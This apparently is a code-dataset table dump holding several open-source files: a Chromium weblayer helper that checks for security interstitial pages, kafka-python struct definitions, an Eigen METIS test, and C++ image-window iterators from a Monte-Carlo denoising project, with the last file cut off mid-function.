max_stars_count (int64, 301-224k) | text (stringlengths, 6-1.05M) | token_count (int64, 3-727k) |
---|---|---|
14,668 | // Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "weblayer/test/interstitial_utils.h"
#include "components/security_interstitials/content/bad_clock_blocking_page.h"
#include "components/security_interstitials/content/captive_portal_blocking_page.h"
#include "components/security_interstitials/content/insecure_form_blocking_page.h"
#include "components/security_interstitials/content/security_interstitial_page.h"
#include "components/security_interstitials/content/security_interstitial_tab_helper.h"
#include "components/security_interstitials/content/ssl_blocking_page.h"
#include "weblayer/browser/tab_impl.h"
namespace weblayer {
namespace {
// Returns the security interstitial currently showing in |tab|, or null if
// there is no such interstitial.
security_interstitials::SecurityInterstitialPage*
GetCurrentlyShowingInterstitial(Tab* tab) {
TabImpl* tab_impl = static_cast<TabImpl*>(tab);
security_interstitials::SecurityInterstitialTabHelper* helper =
security_interstitials::SecurityInterstitialTabHelper::FromWebContents(
tab_impl->web_contents());
return helper
? helper
->GetBlockingPageForCurrentlyCommittedNavigationForTesting()
: nullptr;
}
// Returns true if a security interstitial of type |type| is currently showing
// in |tab|.
bool IsShowingInterstitialOfType(
Tab* tab,
security_interstitials::SecurityInterstitialPage::TypeID type) {
auto* blocking_page = GetCurrentlyShowingInterstitial(tab);
if (!blocking_page)
return false;
return blocking_page->GetTypeForTesting() == type;
}
} // namespace
bool IsShowingSecurityInterstitial(Tab* tab) {
return GetCurrentlyShowingInterstitial(tab) != nullptr;
}
bool IsShowingSSLInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(tab, SSLBlockingPage::kTypeForTesting);
}
bool IsShowingCaptivePortalInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(
tab, CaptivePortalBlockingPage::kTypeForTesting);
}
bool IsShowingBadClockInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(tab,
BadClockBlockingPage::kTypeForTesting);
}
bool IsShowingInsecureFormInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(
tab, security_interstitials::InsecureFormBlockingPage::kTypeForTesting);
}
} // namespace weblayer
| 796 |
4,389 | """ Other useful structs """
from __future__ import absolute_import
from collections import namedtuple
"""A topic and partition tuple
Keyword Arguments:
topic (str): A topic name
partition (int): A partition id
"""
TopicPartition = namedtuple("TopicPartition",
["topic", "partition"])
"""A Kafka broker metadata used by admin tools.
Keyword Arguments:
nodeId (int): The Kafka broker id.
host (str): The Kafka broker hostname.
port (int): The Kafka broker port.
rack (str): The rack of the broker, which is used in rack-aware
partition assignment for fault tolerance.
Examples: `RACK1`, `us-east-1d`. Default: None
"""
BrokerMetadata = namedtuple("BrokerMetadata",
["nodeId", "host", "port", "rack"])
"""A topic partition metadata describing the state in the MetadataResponse.
Keyword Arguments:
topic (str): The topic name of the partition this metadata relates to.
partition (int): The id of the partition this metadata relates to.
leader (int): The id of the broker that is the leader for the partition.
replicas (List[int]): The ids of all brokers that contain replicas of the
partition.
isr (List[int]): The ids of all brokers that contain in-sync replicas of
the partition.
error (KafkaError): A KafkaError object associated with the request for
this partition metadata.
"""
PartitionMetadata = namedtuple("PartitionMetadata",
["topic", "partition", "leader", "replicas", "isr", "error"])
"""The Kafka offset commit API
The Kafka offset commit API allows users to provide additional metadata
(in the form of a string) when an offset is committed. This can be useful
(for example) to store information about which node made the commit,
what time the commit was made, etc.
Keyword Arguments:
offset (int): The offset to be committed
metadata (str): Non-null metadata
"""
OffsetAndMetadata = namedtuple("OffsetAndMetadata",
# TODO add leaderEpoch: OffsetAndMetadata(offset, leaderEpoch, metadata)
["offset", "metadata"])
"""An offset and timestamp tuple
Keyword Arguments:
offset (int): An offset
timestamp (int): The timestamp associated with the offset
"""
OffsetAndTimestamp = namedtuple("OffsetAndTimestamp",
["offset", "timestamp"])
MemberInformation = namedtuple("MemberInformation",
["member_id", "client_id", "client_host", "member_metadata", "member_assignment"])
GroupInformation = namedtuple("GroupInformation",
["error_code", "group", "state", "protocol_type", "protocol", "members", "authorized_operations"])
"""Define retry policy for async producer
Keyword Arguments:
limit (int): Number of retries. limit >= 0; 0 means no retries
backoff_ms (int): Milliseconds to backoff.
retry_on_timeouts (bool): Whether to retry when a request times out.
"""
RetryOptions = namedtuple("RetryOptions",
["limit", "backoff_ms", "retry_on_timeouts"])
| 939 |
2,111 | // This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2012 <NAME> <<EMAIL>>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#include "sparse_solver.h"
#include <Eigen/SparseLU>
#include <Eigen/MetisSupport>
#include <unsupported/Eigen/SparseExtra>
template<typename T> void test_metis_T()
{
SparseLU<SparseMatrix<T, ColMajor>, MetisOrdering<int> > sparselu_metis;
check_sparse_square_solving(sparselu_metis);
}
EIGEN_DECLARE_TEST(metis_support)
{
CALL_SUBTEST_1(test_metis_T<double>());
}
| 266 |
826 | // This file is part of the reference implementation for the paper
// Bayesian Collaborative Denoising for Monte-Carlo Rendering
// <NAME> and <NAME>.
// Computer Graphics Forum (Proc. EGSR 2017), vol. 36, no. 4, p. 137-153, 2017
//
// All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE.txt file.
#include <iostream>
#include <algorithm>
#include <cassert>
namespace bcd
{
// ------------------------ PixelPosition ------------------------
inline PixelPosition::PixelPosition() : m_line(0), m_column(0) {}
inline PixelPosition::PixelPosition(int i_line, int i_column) :
m_line(i_line), m_column(i_column) {}
inline PixelPosition::PixelPosition(const PixelPosition& i_rPos) :
m_line(i_rPos.m_line), m_column(i_rPos.m_column) {}
inline PixelPosition& PixelPosition::operator=(const PixelPosition& i_rPos)
{
m_line = i_rPos.m_line;
m_column = i_rPos.m_column;
return *this;
}
inline void PixelPosition::get(int& o_rLine, int& o_rColumn) const
{
o_rLine = m_line;
o_rColumn = m_column;
}
inline PixelPosition PixelPosition::operator+(const PixelPosition& i_rPix) const
{
return PixelPosition(m_line + i_rPix.m_line, m_column + i_rPix.m_column);
}
inline PixelPosition PixelPosition::operator-(const PixelPosition& i_rPix) const
{
return PixelPosition(m_line - i_rPix.m_line, m_column - i_rPix.m_column);
}
inline bool PixelPosition::operator==(const PixelPosition& i_rPix) const
{
return (m_line == i_rPix.m_line) && (m_column == i_rPix.m_column);
}
inline bool PixelPosition::operator!=(const PixelPosition& i_rPix) const
{
return (m_line != i_rPix.m_line) || (m_column != i_rPix.m_column);
}
// ------------------------ PixelWindow::iterator ------------------------
inline PixelWindow::iterator::iterator() :
m_minCorner(),
m_maxCorner(),
m_currentPixel()
{
}
inline PixelWindow::iterator::iterator(PixelPosition i_centralPixel, int i_radius) :
m_minCorner(i_centralPixel.m_line - i_radius, i_centralPixel.m_column - i_radius),
m_maxCorner(i_centralPixel.m_line + i_radius, i_centralPixel.m_column + i_radius),
m_currentPixel(m_minCorner)
{
}
inline PixelWindow::iterator::iterator(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_bufferWidth, i_bufferHeight, i_centralPixel, i_radius, i_border);
}
inline PixelWindow::iterator::iterator(
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel) :
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel)
{
}
inline void PixelWindow::iterator::reset(PixelPosition i_centralPixel, int i_radius)
{
m_minCorner = PixelPosition(i_centralPixel.m_line - i_radius, i_centralPixel.m_column - i_radius);
m_maxCorner = PixelPosition(i_centralPixel.m_line + i_radius, i_centralPixel.m_column + i_radius);
m_currentPixel = m_minCorner;
}
inline void PixelWindow::iterator::reset(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(i_bufferHeight - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(i_bufferWidth - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
}
inline PixelWindowSize PixelWindow::iterator::getSize() const
{
return PixelWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
inline const PixelPosition& PixelWindow::iterator::operator*() const
{
return m_currentPixel;
}
inline PixelWindow::iterator& PixelWindow::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
}
else
{
m_currentPixel.m_column++;
}
return *this;
}
inline bool PixelWindow::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
inline bool PixelWindow::iterator::operator!=(const iterator& i_rIt) const
{
return m_currentPixel != i_rIt.m_currentPixel;
}
// ------------------------ PixelWindow ------------------------
inline PixelWindow::PixelWindow() :
m_width(0),
m_height(0),
m_minCorner(),
m_maxCorner()
{
}
inline PixelWindow::PixelWindow(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_bufferWidth, i_bufferHeight, i_centralPixel, i_radius, i_border);
}
inline void PixelWindow::reset(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_bufferWidth;
m_height = i_bufferHeight;
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
}
inline PixelWindowSize PixelWindow::getSize() const
{
return PixelWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
inline PixelWindow::iterator PixelWindow::begin() const
{
return iterator(
m_minCorner, m_maxCorner,
m_minCorner);
}
inline PixelWindow::iterator PixelWindow::end() const
{
return iterator(
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column));
}
// ------------------------ DeepImage<>::iterator ------------------------
template < typename scalar >
inline DeepImage< scalar >::iterator::iterator() :
m_pCurrentPixelDataPtr(nullptr), m_nbOfScalarsInPixelData(0)
{
}
template < typename scalar >
inline DeepImage< scalar >::iterator::iterator(scalar* i_pPixelDataPtr, int i_nbOfScalarsInPixelData) :
m_pCurrentPixelDataPtr(i_pPixelDataPtr), m_nbOfScalarsInPixelData(i_nbOfScalarsInPixelData)
{
}
template < typename scalar >
inline scalar* DeepImage< scalar >::iterator::operator*() const
{
return m_pCurrentPixelDataPtr;
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator& DeepImage< scalar >::iterator::operator++()
{
m_pCurrentPixelDataPtr += m_nbOfScalarsInPixelData;
return *this;
}
template < typename scalar >
inline scalar& DeepImage< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentPixelDataPtr[i_dimensionIndex];
}
template < typename scalar >
inline bool DeepImage< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentPixelDataPtr != i_rIt.m_pCurrentPixelDataPtr;
}
// ------------------------ DeepImage<>::const_iterator ------------------------
template < typename scalar >
inline DeepImage< scalar >::const_iterator::const_iterator() :
m_pCurrentPixelDataPtr(nullptr), m_nbOfScalarsInPixelData(0)
{
}
template < typename scalar >
inline DeepImage< scalar >::const_iterator::const_iterator(const scalar* i_pPixelDataPtr, int i_nbOfScalarsInPixelData) :
m_pCurrentPixelDataPtr(i_pPixelDataPtr), m_nbOfScalarsInPixelData(i_nbOfScalarsInPixelData)
{
}
template < typename scalar >
inline const scalar* DeepImage< scalar >::const_iterator::operator*() const
{
return m_pCurrentPixelDataPtr;
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator& DeepImage< scalar >::const_iterator::operator++()
{
m_pCurrentPixelDataPtr += m_nbOfScalarsInPixelData;
return *this;
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::const_iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentPixelDataPtr[i_dimensionIndex];
}
template < typename scalar >
inline bool DeepImage< scalar >::const_iterator::operator!=(const const_iterator& i_rIt) const
{
return m_pCurrentPixelDataPtr != i_rIt.m_pCurrentPixelDataPtr;
}
// ------------------------ DeepImage<> ------------------------
template < typename scalar >
inline DeepImage< scalar >::DeepImage() :
m_width(0u), m_height(0u), m_depth(0u),
m_widthTimesDepth(0u),
m_data() {}
template < typename scalar >
inline DeepImage< scalar >::DeepImage(int i_width, int i_height, int i_depth) :
m_width(i_width), m_height(i_height), m_depth(i_depth),
m_widthTimesDepth(i_width * i_depth),
m_data(i_width * i_height * i_depth) {}
// DeepImage(DeepImage<scalar>&&) = default; ///< Default move constructor does not work with visual studio 2013
template < typename scalar >
inline DeepImage< scalar >::DeepImage(DeepImage<scalar>&& i_tImage) :
m_width(i_tImage.m_width), m_height(i_tImage.m_height), m_depth(i_tImage.m_depth),
m_widthTimesDepth(i_tImage.m_width * i_tImage.m_depth),
m_data(std::move(i_tImage.m_data)) {}
// DeepImage< scalar >& operator=(DeepImage<scalar>&&) = default; ///< Default move assignment operator does not work with visual studio 2013
template < typename scalar >
inline DeepImage< scalar >& DeepImage< scalar >::operator=(DeepImage<scalar>&& i_tImage)
{
m_width = i_tImage.m_width;
m_height = i_tImage.m_height;
m_depth = i_tImage.m_depth;
m_widthTimesDepth = i_tImage.m_width * i_tImage.m_depth;
m_data = std::move(i_tImage.m_data);
return *this;
}
template < typename scalar >
inline void DeepImage< scalar >::resize(int i_width, int i_height, int i_depth)
{
m_width = i_width;
m_height = i_height;
m_depth = i_depth;
m_widthTimesDepth = i_width * i_depth;
m_data.resize(i_width * i_height * i_depth);
}
template < typename scalar >
inline void DeepImage< scalar >::copyDataFrom(const scalar* i_pData)
{
std::copy(i_pData, i_pData + getSize(), m_data.begin());
}
template < typename scalar >
inline void DeepImage< scalar >::copyDataTo(scalar* i_pData) const
{
std::copy(m_data.begin(), m_data.end(), i_pData);
}
template < typename scalar >
inline int DeepImage< scalar >::getWidth() const { return m_width; }
template < typename scalar >
inline int DeepImage< scalar >::getHeight() const { return m_height; }
template < typename scalar >
inline int DeepImage< scalar >::getDepth() const { return m_depth; }
template < typename scalar >
inline int DeepImage< scalar >::getSize() const { return m_data.size(); }
template < typename scalar >
inline scalar* DeepImage< scalar >::getDataPtr() { return m_data.data(); }
template < typename scalar >
inline const scalar* DeepImage< scalar >::getDataPtr() const { return m_data.data(); }
template < typename scalar >
inline PixelPosition DeepImage< scalar >::clamp(const PixelPosition& pos) const {
return PixelPosition(std::max(0, std::min(pos.m_line, m_height - 1)),
std::max(0, std::min(pos.m_column, m_width - 1)));
}
template < typename scalar >
inline int DeepImage< scalar >::glueIndices(int i_line, int i_column, int i_dimensionIndex) const
{
assert(i_line >= 0);
assert(i_line < m_height);
assert(i_column >= 0);
assert(i_column < m_width);
assert(i_dimensionIndex >= 0);
assert(i_dimensionIndex < m_depth);
return i_line * m_widthTimesDepth + i_column * m_depth + i_dimensionIndex;
}
template < typename scalar >
inline int DeepImage< scalar >::glueIndices(
int i_width, int i_height, int i_depth,
int i_line, int i_column, int i_dimensionIndex)
{
assert(i_line >= 0);
assert(i_line < i_height);
assert(i_column >= 0);
assert(i_column < i_width);
assert(i_dimensionIndex >= 0);
assert(i_dimensionIndex < i_depth);
return (i_line * i_width + i_column) * i_depth + i_dimensionIndex;
}
template < typename scalar >
inline void DeepImage< scalar >::splitIndex(
int& o_rLine, int& o_rColumn, int& o_rDimensionIndex,
int i_buffer1DIndex) const
{
o_rLine = i_buffer1DIndex / m_widthTimesDepth;
o_rColumn = (i_buffer1DIndex / m_depth) % m_width;
o_rDimensionIndex = i_buffer1DIndex % m_depth;
}
template < typename scalar >
inline void DeepImage< scalar >::splitIndex(
int& o_rLine, int& o_rColumn, int& o_rDimensionIndex,
int i_buffer1DIndex,
int i_width, int i_height, int i_depth)
{
o_rLine = i_buffer1DIndex / (i_width * i_depth);
o_rColumn = (i_buffer1DIndex / i_depth) % i_width;
o_rDimensionIndex = i_buffer1DIndex % i_depth;
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(int i_line, int i_column, int i_dimensionIndex) const
{
return m_data[glueIndices(i_line, i_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(int i_line, int i_column, int i_dimensionIndex)
{
return m_data[glueIndices(i_line, i_column, i_dimensionIndex)];
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(PixelPosition i_pixel, int i_dimensionIndex) const
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(PixelPosition i_pixel, int i_dimensionIndex)
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(int i_buffer1DIndex) const
{
return m_data[i_buffer1DIndex];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(int i_buffer1DIndex)
{
return m_data[i_buffer1DIndex];
}
template < typename scalar >
inline const scalar DeepImage< scalar >::getValue(PixelPosition i_pixel, int i_dimensionIndex) const
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar DeepImage< scalar >::getValue(PixelPosition i_pixel, int i_dimensionIndex)
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline void DeepImage< scalar >::set(int i_line, int i_column, int i_dimensionIndex, scalar i_value)
{
m_data[glueIndices(i_line, i_column, i_dimensionIndex)] = i_value;
}
template < typename scalar >
inline void DeepImage< scalar >::set(PixelPosition i_pixel, int i_dimensionIndex, scalar i_value)
{
m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)] = i_value;
}
template < typename scalar >
inline void DeepImage< scalar >::set(int i_buffer1DIndex, scalar i_value) { m_data[i_buffer1DIndex] = i_value; }
template < typename scalar >
inline void DeepImage< scalar >::set(int i_line, int i_column, const scalar* i_pVectorValue)
{
std::copy(i_pVectorValue, i_pVectorValue + m_depth, &(get(i_line, i_column, 0)));
// for(int d = 0; d < m_depth; d++)
// set(i_line, i_column, d, i_pVectorValue[d]);
}
template < typename scalar >
inline void DeepImage< scalar >::set(PixelPosition i_pixel, const scalar* i_pVectorValue)
{
std::copy(i_pVectorValue, i_pVectorValue + m_depth, &(get(i_pixel, 0)));
// for(int d = 0; d < m_depth; d++)
// set(i_line, i_column, d, i_pVectorValue[d]);
}
template < typename scalar >
inline void DeepImage< scalar >::isotropicalScale(scalar i_scaleFactor)
{
for(auto it = m_data.begin(); it != m_data.end(); it++)
*it *= i_scaleFactor;
}
template < typename scalar >
inline void DeepImage< scalar >::anisotropicalScale(const scalar* i_scaleFactors)
{
int size = getSize();
for(int d = 0; d < size; d++)
m_data[d] *= i_scaleFactors[d % m_depth];
}
template < typename scalar >
inline void DeepImage< scalar >::fill(scalar f)
{
std::fill(m_data.begin(), m_data.end(), f);
}
template < typename scalar >
inline bool DeepImage< scalar >::isEmpty() const
{
return m_width == 0 || m_height == 0 || m_depth == 0;
}
template < typename scalar >
inline void DeepImage< scalar >::clearAndFreeMemory()
{
m_width = m_height = m_depth = m_widthTimesDepth = 0;
std::vector< scalar >().swap(m_data); // swap trick to free memory
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator DeepImage< scalar >::begin()
{
return DeepImage< scalar >::iterator(m_data.data(), m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator DeepImage< scalar >::end()
{
return DeepImage< scalar >::iterator(m_data.data() + m_widthTimesDepth * m_height, m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator DeepImage< scalar >::begin() const
{
return DeepImage< scalar >::const_iterator(m_data.data(), m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator DeepImage< scalar >::end() const
{
return DeepImage< scalar >::const_iterator(m_data.data() + m_widthTimesDepth * m_height, m_depth);
}
template < typename scalar >
inline DeepImage<scalar>& DeepImage< scalar >::operator+=(const DeepImage& i_rImage)
{
typename std::vector<scalar>::const_iterator it = i_rImage.m_data.cbegin();
for(scalar& rValue : m_data)
rValue += *it++;
return *this;
}
template < typename scalar >
inline DeepImage<scalar>& DeepImage< scalar >::operator-=(const DeepImage& i_rImage)
{
typename std::vector<scalar>::const_iterator it = i_rImage.m_data.cbegin();
for(scalar& rValue : m_data)
rValue -= *it++;
return *this;
}
// ------------------------ ImageWindow<>::iterator ------------------------
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_currentPixel(),
m_pCurrentDataPointer(nullptr)
{
}
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator(
int i_width,
int i_height,
int i_depth,
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel,
scalar* i_pCurrentDataPointer) :
m_width(i_width),
m_height(i_height),
m_depth(i_depth),
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel),
m_pCurrentDataPointer(i_pCurrentDataPointer)
{
}
template < typename scalar >
inline void ImageWindow< scalar >::iterator::reset(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
m_pCurrentDataPointer = &(i_rImage.get(m_currentPixel, 0));
}
template < typename scalar >
inline ImageWindowSize ImageWindow< scalar >::iterator::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline scalar* ImageWindow< scalar >::iterator::operator*() const
{
return m_pCurrentDataPointer;
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator& ImageWindow< scalar >::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
m_pCurrentDataPointer += m_depth * (m_width + m_minCorner.m_column - m_maxCorner.m_column);
}
else
{
m_currentPixel.m_column++;
m_pCurrentDataPointer += m_depth;
}
return *this;
}
template < typename scalar >
inline bool ImageWindow< scalar >::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
template < typename scalar >
inline scalar& ImageWindow< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentDataPointer[i_dimensionIndex];
}
template < typename scalar >
inline bool ImageWindow< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentDataPointer != i_rIt.m_pCurrentDataPointer;
}
// ------------------------ ImageWindow<> ------------------------
template < typename scalar >
inline ImageWindow< scalar >::ImageWindow() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_pMinCornerDataPointer(nullptr)
{
}
template < typename scalar >
inline ImageWindow< scalar >::ImageWindow(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline void ImageWindow< scalar >::reset(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_pMinCornerDataPointer = &(i_rImage.get(m_minCorner, 0));
}
template < typename scalar >
inline ImageWindowSize ImageWindow< scalar >::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator ImageWindow< scalar >::begin() const
{
return iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
m_minCorner,
m_pMinCornerDataPointer);
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator ImageWindow< scalar >::end() const
{
return iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column),
m_pMinCornerDataPointer + (1 + m_maxCorner.m_line - m_minCorner.m_line) * m_depth * m_width);
}
// ------------------------ ConstImageWindow<>::iterator ------------------------
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_currentPixel(),
m_pCurrentDataPointer(nullptr)
{
}
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator(
int i_width,
int i_height,
int i_depth,
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel,
const scalar* i_pCurrentDataPointer) :
m_width(i_width),
m_height(i_height),
m_depth(i_depth),
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel),
m_pCurrentDataPointer(i_pCurrentDataPointer)
{
}
template < typename scalar >
inline void ConstImageWindow< scalar >::iterator::reset(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
m_pCurrentDataPointer = &(i_rImage.get(m_currentPixel, 0));
}
template < typename scalar >
inline ImageWindowSize ConstImageWindow< scalar >::iterator::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline const scalar* ConstImageWindow< scalar >::iterator::operator*() const
{
return m_pCurrentDataPointer;
}
template < typename scalar >
inline typename ConstImageWindow< scalar >::iterator& ConstImageWindow< scalar >::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
m_pCurrentDataPointer += m_depth * (m_width + m_minCorner.m_column - m_maxCorner.m_column);
}
else
{
m_currentPixel.m_column++;
m_pCurrentDataPointer += m_depth;
}
return *this;
}
template < typename scalar >
inline bool ConstImageWindow< scalar >::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
template < typename scalar >
inline const scalar& ConstImageWindow< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentDataPointer[i_dimensionIndex];
}
template < typename scalar >
inline bool ConstImageWindow< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentDataPointer != i_rIt.m_pCurrentDataPointer;
}
// ------------------------ ConstImageWindow<> ------------------------
template < typename scalar >
inline ConstImageWindow< scalar >::ConstImageWindow() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_pMinCornerDataPointer(nullptr)
{
}
template < typename scalar >
inline ConstImageWindow< scalar >::ConstImageWindow(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline void ConstImageWindow< scalar >::reset(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_pMinCornerDataPointer = &(i_rImage.get(m_minCorner, 0));
}
template < typename scalar >
inline ImageWindowSize ConstImageWindow< scalar >::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline typename ConstImageWindow<scalar>::iterator ConstImageWindow< scalar >::begin() const
{
return ConstImageWindow<scalar>::iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
m_minCorner,
m_pMinCornerDataPointer);
}
template < typename scalar >
inline typename ConstImageWindow<scalar>::iterator ConstImageWindow< scalar >::end() const
{
return ConstImageWindow<scalar>::iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column),
